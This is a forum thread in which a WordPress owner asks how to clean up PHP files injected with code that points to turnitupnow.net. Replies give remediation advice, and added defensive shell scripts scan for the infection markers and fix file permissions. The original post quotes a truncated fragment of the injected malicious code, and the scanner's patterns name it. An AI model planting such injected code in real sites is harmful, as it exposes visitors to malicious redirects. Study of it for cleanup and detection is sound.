razzc says

My WP site’s PHP files have got some code in the first line of all the PHP files. I have been sitting cleaning it up and have done most of them. I was wondering if anyone can please let me know if this is all I would have to do or if there is more to it? It has infected the site that just went live a couple of days ago.

I just don’t want to recreate the site.

It’s from some site, turnitupnow.net, if someone knows what I am talking about. I don’t think it would be appropriate to paste the entire nasty code in here but it looks like:

if(!$sessdt_o) and { $sessdt_f = “102”; if(!@headers_sent()) and else { echo “u = “http://turnitupnow.net/?rnd=”.$sessdt_f.substr($ses

It’s a lot longer than this. I have deleted more than half of this poisonous code. Hopefully it’s OK to post it in here.

Thanks everyone in advance.

iamthwee says

If it was me I would have started from fresh, changed all my ftp passwords and wordpress passwords.

Then go through the wp files and lock down the permissions.

If that is not possible you should at LEAST change your ftp password and WP admin passwords.

TylerQuinn says

1. Change all your info: FTP, WP passwords and database passwords.

2. I would delete everything in the directory as you never know if they added a back door (you can get your uploaded content, just make a copy of it and scan it for anything weird.) and then upload a fresh install of the latest WP.

3. Install with all your new DB login info, all you need to do is create the wp-config file manually and it will hook right back up to all of your DB content.

4. Contact your host if you have more than one domain on that hosting account. Just because the WP site is hacked does not mean they came into your data from that site.

5. I would also run a local scan on your computer to make sure there is nothing stealing your PWs.
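One way to do the scan from step 2 on the copy of your content, as an added example that is not part of the original posts. The marker strings are taken from the snippet razzc quoted; the function names, the 300-character threshold and the demo tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the thread: scan a copy of a WordPress tree.
# Marker strings come from the snippet razzc posted; the length threshold
# and the demo tree are assumptions/constructed.

MARKERS='sessdt_o|sessdt_f|turnitupnow\.net'
MAX_FIRST_LINE=300   # assumption: a clean first line is little more than "<?php"

# Print one "reason: path" line per suspicious file under directory $1.
scan_php_tree() {
    # 1. PHP files containing a marker from the posted snippet.
    find "$1" -type f -name '*.php' -exec grep -El "$MARKERS" {} + |
        sed 's/^/marker: /'
    # 2. PHP files with an abnormally long first line (code prepended to line 1).
    find "$1" -type f -name '*.php' -exec awk -v max="$MAX_FIRST_LINE" \
        'FNR == 1 && length($0) > max { print "long-first-line: " FILENAME }' {} +
    # 3. Any PHP under an uploads directory; media folders should hold none.
    find "$1" -type f -path '*/uploads/*' -name '*.php' |
        sed 's/^/php-in-uploads: /'
    return 0
}

# Build a small constructed tree to exercise the three checks.
make_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/wp-includes" "$d/wp-content/uploads/2012"
    printf '<?php\necho "ok";\n' > "$d/wp-includes/clean.php"
    printf '<?php if(!$sessdt_o) { $sessdt_f = "102"; } ?><?php\necho "theme";\n' \
        > "$d/wp-content/infected.php"
    awk 'BEGIN { printf "<?php /*"; for (i = 0; i < 400; i++) printf "x"; print "*/" }' \
        > "$d/wp-content/padded.php"
    printf '<?php echo 1;\n' > "$d/wp-content/uploads/2012/img.php"
    printf 'jpeg bytes\n' > "$d/wp-content/uploads/2012/photo.jpg"
    echo "$d"
}

if [ "${1:-}" = "--demo" ]; then
    tree=$(make_demo_tree) && scan_php_tree "$tree" && rm -rf "$tree"
fi
```

A clean result only means these three checks found nothing; it does not prove the copy is free of a back door, which is why the fresh install in step 2 still applies.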

PixelBuffet says

Unfortunately to make sure it’s secure, you’re going to have to do as Tyler has put above. Anything less and you can’t be sure.

Also once you get the site back up and running, research every plugin you’ve used to see if anyone has reported vulnerabilities.

I had a WP site hacked in a similar way, and it was because they exploited a vulnerability in a plugin. Obviously after re-building, I found another way of solving the problem without that plugin and everything has been fine since.

canimalition says

One thing you shouldn’t forget: BACKUP ;) I do this for all the content I have, using an Internet connection.

FYI: If you have a Twitter account or something, do not CLICK any link you don’t know about. If you got the link via bit.ly, for example bit.ly/fhrfjf, add a plus (+) after the link, for example bit.ly/fhrfjf+, so you will know exactly what the real link inside the short link is.

This is what I got on my Twitter:

and adding + after the link, here I got:

This link got more than 5000+ clicks. OMG

That’s information from me to you ALL :)

razzc says

@iamthwee, @TylerQuinn, @PixelBuffet and @canimalition

Thank you all for the support. Like TylerQuinn said – I had to clean everything, guys, and go back to ground zero. I sus one of the theme authors that I bought a theme from at themeforest. They weren’t very helpful and I had a go at them. I had to give them my admin credentials to help with CSS tweaks. So the moral of the story is: don’t be a moron like me and trust someone you don’t know, and if you do, don’t have a go at them, and if you do both, change your admin credentials straight away.

Thanks again fellows.

razzc says

If it was me I would have started from fresh, changed all my ftp passwords and wordpress passwords.

Then go through the wp files and lock down the permissions.

If that is not possible you should at LEAST change your ftp password and WP admin passwords.

How do you lock down permissions?

iamthwee says

^^

Well I tend to follow this: http://codex.wordpress.org/Changing_File_Permissions

As a guideline, although you have to test your site to see if some files need different permissions, especially if you’re using a script to write to a folder or dynamically resize an image, e.g. timthumb.

One thing Tyler mentioned which is highly important… Your security is only as good as the machine you’re uploading it from. So if your computer is rife with spyware and viruses, it won’t matter what you do to lock down your website….

Also, something that hasn’t been mentioned is to try to avoid uploading/signing on from an unsecured connection. With the rise in popularity of coffee franchises offering free UNSECURED wifi, a lot of people out there are logging on – leaving their logon details open to ‘snoopers’ on the network – unless, of course, you’re using https, but this is unlikely for WP logons.
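A sketch of locking down permissions along the lines of the Codex page linked above (directories 755, files 644), added here as an example and not taken from the original posts. The function names, the 600 mode on wp-config.php and the demo tree are assumptions; folders a script must write to, as mentioned for timthumb, have to be re-opened by hand after testing the site.

```shell
#!/bin/sh
# Added example, not from the thread: audit and apply a permissions baseline
# (directories 755, files 644). The 600 on wp-config.php and the demo tree
# are assumptions for illustration.

# List anything group- or world-writable, plus a wp-config.php others can read.
audit_wp_perms() {
    find "$1" \( -type f -o -type d \) \( -perm -020 -o -perm -002 \) |
        sed 's/^/writable-by-others: /'
    if [ -f "$1/wp-config.php" ]; then
        find "$1/wp-config.php" \( -perm -040 -o -perm -004 \) |
            sed 's/^/config-readable-by-others: /'
    fi
    return 0
}

# Apply the baseline to the whole tree rooted at $1.
lock_down_wp() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
    # Holds the database password, so keep it owner-only (assumed mode).
    if [ -f "$1/wp-config.php" ]; then chmod 600 "$1/wp-config.php"; fi
}

# Constructed tree with the loose modes often left behind after a quick setup.
make_loose_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/wp-content/uploads" "$d/wp-includes"
    printf '<?php // config\n' > "$d/wp-config.php"
    printf '<?php // core\n'   > "$d/wp-includes/load.php"
    printf 'image\n'           > "$d/wp-content/uploads/a.jpg"
    chmod 777 "$d/wp-content/uploads"
    chmod 666 "$d/wp-includes/load.php"
    chmod 644 "$d/wp-config.php"
    echo "$d"
}

if [ "${1:-}" = "--demo" ]; then
    tree=$(make_loose_tree) && audit_wp_perms "$tree" &&
        lock_down_wp "$tree" && audit_wp_perms "$tree" && rm -rf "$tree"
fi
```

Run the audit again after every plugin or theme install, since installers and manual uploads can reintroduce writable paths.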

razzc says

Thanks iamthwee. I think I shouldn’t allow browsers to remember my credentials. I do that simply because it’s easier to login. Too lazy for my own good.

Thanks for the thoroughness :)
Joost Volunteer moderator says

Thanks iamthwee. I think I shouldn’t allow browsers to remember my credentials. I do that simply because it’s easier to login. Too lazy for my own good. Thanks for the thoroughness :)

I don’t quite understand how this posed a security risk, as nobody had physical access to your machine, right?

EDIT: Never mind, I missed the piece where iamthwee spoke about your machine being compromised ;) Of course then it’s not too great to have the passwords stored in your browser unencrypted (set a master password) – but for WiFi sniffing it doesn’t matter, and it’s even quite a nice prevention against keylogging (as you don’t type your password for the logger to see).
